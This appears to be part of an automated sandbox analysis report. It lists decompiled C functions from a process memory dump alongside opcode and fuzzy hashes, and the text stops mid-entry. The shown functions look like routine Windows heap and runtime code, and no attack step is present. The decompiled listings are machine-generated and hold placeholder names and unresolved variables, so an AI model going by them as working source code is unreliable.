Opcode Fuzzy Hash: acbfa748f56c5ed2d79a17a0c86c3da0772256a32b6a45423978547dcd3e15f4
Instruction Fuzzy Hash: 14F06271A24258EFCB04DFA8D406A6EB7F8FF15300F444469F915EB381EA349940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0524C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0524C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0524C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x52011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E052F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0524c577
0x0524c57d
0x0524c581
0x0524c5b5
0x0524c5b9
0x0524c5ce
0x0524c5ce
0x0524c5ca
0x00000000
0x0524c5ca
0x0524c5c4
0x0524c5c8
0x00000000
0x00000000
0x00000000
0x0524c5ad
0x00000000
0x0524c5af

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f7465ab77edefd97c79eb9bfc750e2b6f94dc95d074e68fb6fed1bb71c704d
Instruction ID: d523e647c36d2860219eb366c2d7b060205f69d41beb62ce239a312576aed8e4
Opcode Fuzzy Hash: d8f7465ab77edefd97c79eb9bfc750e2b6f94dc95d074e68fb6fed1bb71c704d
Instruction Fuzzy Hash: 9BF067B293B6D69AD729C72CC40CB2ABBE9AF05660F448466D40AB7241E6A4DC80CA50

Uniqueness

Uniqueness Score: -1.00%

Function 052F8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E052F8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x531d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E05247D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0526B640(E05269AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x052f8d34
0x052f8d43
0x052f8d4b
0x052f8d4e
0x052f8d52
0x052f8d5c
0x052f8d6e
0x052f8d5e
0x052f8d67
0x052f8d67
0x052f8d79
0x052f8d7a
0x052f8d7c
0x052f8d81
0x052f8d94

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8a39542cebff3ec94e89b44429ab593902c4b322cd3a5b9efe2af86d174b056
Instruction ID: 1f3a562ae71609f5a0bbeeb9b823b0dd852665bae3b531f7763192ccaf2dcaf2
Opcode Fuzzy Hash: b8a39542cebff3ec94e89b44429ab593902c4b322cd3a5b9efe2af86d174b056
Instruction Fuzzy Hash: 61F05470A2460C9FD714EFB8D545A6EB7B8EF14700F5084A9E915EB291DA34D900CB54

Uniqueness

Uniqueness Score: -1.00%

Function 052E2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E052E2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E052DFD22(__ecx);
				_t19 =  *0x531849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x5318748; // 0x0
					if(__eflags <= 0) {
						E052E1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x5318724 & 0x00000004;
							if(( *0x5318724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x5318724; // 0x0
					return E052D8DF1(__ebx, 0xc0000374, 0x5315890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x052e2076
0x052e2078
0x052e207d
0x052e2083
0x052e20a4
0x052e20aa
0x052e20ac
0x052e20b7
0x052e20ba
0x052e20bc
0x052e20c9
0x052e20c9
0x052e20d0
0x052e20d2
0x00000000
0x052e20d2
0x052e20be
0x052e20c3
0x052e20c5
0x052e20c7
0x00000000
0x00000000
0x052e20c7
0x052e20bc
0x052e20d4
0x052e2085
0x052e2085
0x052e20a3
0x052e20a3

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5d2eb6f1b296d9f510b11d2e831b8811eea3862b984d92597d2705efe9b9a81
Instruction ID: 496d14b2629630774ac4b9aea2fd52c700cee13cc2439f0026d237b0af6e7857
Opcode Fuzzy Hash: f5d2eb6f1b296d9f510b11d2e831b8811eea3862b984d92597d2705efe9b9a81
Instruction Fuzzy Hash: 8EF0273E5352858BCE335B34A1066E1AFADEF9A210F891041E8976B280CD358883CA2C

Uniqueness

Uniqueness Score: -1.00%

Function 0526927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0526927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0526FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E052692C6(_t11, _t14);
				}
				return _t11;
			}

0x05269295
0x05269299
0x0526929f
0x052692aa
0x052692ad
0x052692ae
0x052692af
0x052692b0
0x052692b4
0x052692bb
0x052692bb
0x052692c5

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 7beacb5602e4ec544d2eb4d126ca32947eb689f346cef3b2444d66d67ae20727
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 56E09B72350540ABDB51AE55DCC4F57775DEF82721F044079B9045E242CAF5DD49C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0524746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0524746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0523EB70(__ecx, 0x53179a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E052695D0();
							L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0524746d
0x0524746d
0x0524746d
0x05247471
0x05247488
0x0528f92d
0x0524748e
0x05247491
0x05247495
0x0528f937
0x0528f93a
0x0528f94e
0x0528f953
0x0528f956
0x0528f956
0x05247495
0x00000000
0x05247488
0x05247473
0x05247478
0x0524747d
0x05247481
0x00000000
0x05247481
0x0524747d
0x0524747a
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1354f20b6bb69e3971996df7f05b246c4f979b78478443c78fc0aeb7d6343b6a
Instruction ID: 0cdd92b7b1fee8b7ff5d6a14e146966ff270aa8ed859e51290604d52d27ebf3e
Opcode Fuzzy Hash: 1354f20b6bb69e3971996df7f05b246c4f979b78478443c78fc0aeb7d6343b6a
Instruction Fuzzy Hash: 23F0B434635545AACF19D768C540F797B72FF04310F0D0525D876A7190E77498028F85

Uniqueness

Uniqueness Score: -1.00%

Function 052F8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E052F8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x531d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E05247D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0526B640(E05269AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x052f8ce5
0x052f8ced
0x052f8cf0
0x052f8cfb
0x052f8d0d
0x052f8cfd
0x052f8d06
0x052f8d06
0x052f8d18
0x052f8d19
0x052f8d1b
0x052f8d20
0x052f8d33

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d50d2bb58b168cd646dffdea17939f868db372755e58d95e5215941ae28da79
Instruction ID: 02f86dc13e550beb13e141192c0cbe96b6f2d2edff9967d8e5cb4703edc8ccb8
Opcode Fuzzy Hash: 9d50d2bb58b168cd646dffdea17939f868db372755e58d95e5215941ae28da79
Instruction Fuzzy Hash: 54F08970A246089BDB04DBB8E545D6EB7B8EF19300F140559F515EB280DA34D940C754

Uniqueness

Uniqueness Score: -1.00%

Function 05224F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05224F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E052F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0524C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x5201030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x05224f2e
0x05224f34
0x05224f38
0x05280b85
0x05280b85
0x05280b89
0x05280b9a
0x05280b9a
0x05280b9f
0x00000000
0x05280b9f
0x05280b94
0x05280b98
0x00000000
0x00000000
0x00000000
0x05280b98
0x05224f3e
0x05224f48
0x00000000
0x05224f6e
0x00000000
0x05224f70

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c7188d9d2828ae30c60817618d7781bef3b559632246d9dfd4759d907cef563
Instruction ID: b4bd25975a29bec87e168406ad3f72e7d92d279127ca181f3df55fafd574c602
Opcode Fuzzy Hash: 1c7188d9d2828ae30c60817618d7781bef3b559632246d9dfd4759d907cef563
Instruction Fuzzy Hash: 90F0BE3293B6969FD771E798C588F32B7EABF007B8F085474D40A879A1C764EC48C684

Uniqueness

Uniqueness Score: -1.00%

Function 052F8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E052F8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x531d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E05247D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0526B640(E05269AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x052f8b67
0x052f8b6f
0x052f8b72
0x052f8b7d
0x052f8b8f
0x052f8b7f
0x052f8b88
0x052f8b88
0x052f8b9a
0x052f8b9b
0x052f8b9d
0x052f8ba2
0x052f8bb5

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 606c7be62b4153500bf0b7593483c33552558f8d880c8854d307de0842aed739
Instruction ID: ea32b9302f23b125e3e13ad43817e00bf694d8f3871328cab1d098eb7fa4964e
Opcode Fuzzy Hash: 606c7be62b4153500bf0b7593483c33552558f8d880c8854d307de0842aed739
Instruction Fuzzy Hash: 73F08970B242589BDB04EBB4D506E6EB7B8EF04300F040459BA05DB380EB74D901C794

Uniqueness

Uniqueness Score: -1.00%

Function 0525A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0525A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x5317b9c; // 0x0
				_t15 = __ecx;
				_t16 = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0526FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0525a44b
0x0525a453
0x0525a472
0x0525a476
0x00000000
0x0525a493
0x0525a47a
0x0525a47f
0x0525a486
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f43d01f1e6706ef93de1ddabd3ae382aee492e0867a7a004f3fd91f4f96ad3c6
Instruction ID: fceb62c53afe7ae29178da1237d11b82dd843873440a819960b5a8c7cca9f67e
Opcode Fuzzy Hash: f43d01f1e6706ef93de1ddabd3ae382aee492e0867a7a004f3fd91f4f96ad3c6
Instruction Fuzzy Hash: DCE09272B21421ABD3129A58BC01F66739DFFD4A51F194135F905CB214DA78DD01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0522F358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0522F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0525F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L05244620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x0522f35d
0x0522f361
0x0522f367
0x0522f372
0x0522f38c
0x0522f38c
0x0522f394

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: 11204ae6369233a7e668765407a2213fd344b87f1c03678682536ce5e0c03c3d
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 0FE0D832A50168BBDB25A6D99E06F5ABBBCEF44A60F000155BD04D7150D5709D00C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 0523FF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0523FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x52011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E052F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E05240050(_t14);
				}
			}

0x0523ff66
0x0523ff6b
0x00000000
0x0523ff8f
0x00000000
0x0523ff8f

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd2ebd33145282b89641c3070412b63a2bea7308083a9c69260b28ba4113cb63
Instruction ID: 87fdb815b9e73183deefab95685dfc1fd06e63cdc1cf3206606df6e6ab6d8fff
Opcode Fuzzy Hash: bd2ebd33145282b89641c3070412b63a2bea7308083a9c69260b28ba4113cb63
Instruction Fuzzy Hash: 2DE0DFF0A392859FD738DB51F245F3AB7B9AF42721F19801DEC0C4B181C629D880C616

Uniqueness

Uniqueness Score: -1.00%

Function 052B41E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E052B41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x53008f0);
				_t5 = E0527D08C(__ebx, __edi, __esi);
				if( *0x53187ec == 0) {
					E0523EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x53187ec == 0) {
						 *0x53187f0 = 0x53187ec;
						 *0x53187ec = 0x53187ec;
						 *0x53187e8 = 0x53187e4;
						 *0x53187e4 = 0x53187e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L052B4248();
				}
				return E0527D0D1(_t5);
			}

0x052b41e8
0x052b41ea
0x052b41ef
0x052b41fb
0x052b4206
0x052b420b
0x052b4216
0x052b421d
0x052b4222
0x052b422c
0x052b4231
0x052b4231
0x052b4236
0x052b423d
0x052b423d
0x052b4247

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10fd218ea5e696b30e6e93aeab73693eaa8406cb873bbe5a2cb158639420916
Instruction ID: c69f2d3de115c776460e2b90bfa75ccf6b868e27680620552a6376d3a2ec4790
Opcode Fuzzy Hash: e10fd218ea5e696b30e6e93aeab73693eaa8406cb873bbe5a2cb158639420916
Instruction Fuzzy Hash: 7AF01578A70704CEDFA0EFB9958A754BBB9FF44321F80511AA118EB285CB744495DF0D

Uniqueness

Uniqueness Score: -1.00%

Function 052DD380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E052DD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0522E8B0(__ecx, _a4, 0xfff);
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x052dd38a
0x052dd39b
0x052dd3b1
0x00000000
0x052dd3b6
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 0e92655391b204ec242d31d3c65ab852240c3998719679b94e24a3b97e258dea
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: FAE0C231390614BBDB266E44CC00F79BB1AEF407A0F114031FE089AAA0C6719C91EAD4

Uniqueness

Uniqueness Score: -1.00%

Function 0525A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0525A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x53167e4 >= 0xa) {
					if(_t5 < 0x5316800 || _t5 >= 0x5316900) {
						return L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E05240010(0x53167e0, _t5);
				}
			}

0x0525a190
0x0525a1a6
0x0525a1c2
0x00000000
0x00000000
0x00000000
0x0525a192
0x0525a192
0x0525a19f
0x0525a19f

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb74cffa2559facfd5895fc61dcbcea59754a682abeda686fbc95773ac24979a
Instruction ID: 01a57e64173878978b1da51663984a06a13f02b481ceb4d6bd5f2c0be5f0cd7d
Opcode Fuzzy Hash: bb74cffa2559facfd5895fc61dcbcea59754a682abeda686fbc95773ac24979a
Instruction Fuzzy Hash: E1D05B612755006AC71E97B4999BB35332AEF84721FB0890DF60B8ED90DF708CE5D55C

Uniqueness

Uniqueness Score: -1.00%

Function 052516E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E052516E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E05251710(0x53167e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L05244620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x052516e8
0x052516ef
0x052516f3
0x052516fe
0x00000000
0x05251700
0x0525170d
0x0525170d
0x052516f2
0x052516f2
0x052516f2
0x052516f2

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32d317429bb9dfb1d07fb6a9a225e26530dae5fe0e0870d866f1a7350ada3b27
Instruction ID: bf60917a6eecf96a066e28f7fcb7c6ccc7038e7f9366e0e6eeccd1dd8126d6f2
Opcode Fuzzy Hash: 32d317429bb9dfb1d07fb6a9a225e26530dae5fe0e0870d866f1a7350ada3b27
Instruction Fuzzy Hash: 90D0A73126010152DF2D6B24D848B142251FF807A1F38005CF90F498C0CFB0CCB6E44C

Uniqueness

Uniqueness Score: -1.00%

Function 052A53CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E052A53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0523EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x052a53ca
0x052a53ce
0x052a53d9
0x052a53de
0x052a53e1
0x052a53e1
0x052a53e6
0x052a53f3
0x00000000
0x052a53f8
0x052a53fb

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: ff1a867de3c11ca4dddacf2300d5c303db3da4276c5cc45d66bb00faea6cae0b
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 20E08C72A246809FCF16DB48C654F4EB7F9FF84B00F190404A4095F620C624EC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 052535A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E052535A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0523EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x052535a1
0x052535a1
0x052535a5
0x052535ab
0x052535ab
0x052535b5
0x00000000
0x052535c1
0x052535b7

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: ce78d69d6498c60ef7d9cffbdb96e11c6fbf1966f6eea2fdcc5bafdd51a9ce3c
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 1BD0A7B153518199DB02EF10C1387E83373BF142A6F583855880705451C335490DC600

Uniqueness

Uniqueness Score: -1.00%

Function 0523AAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

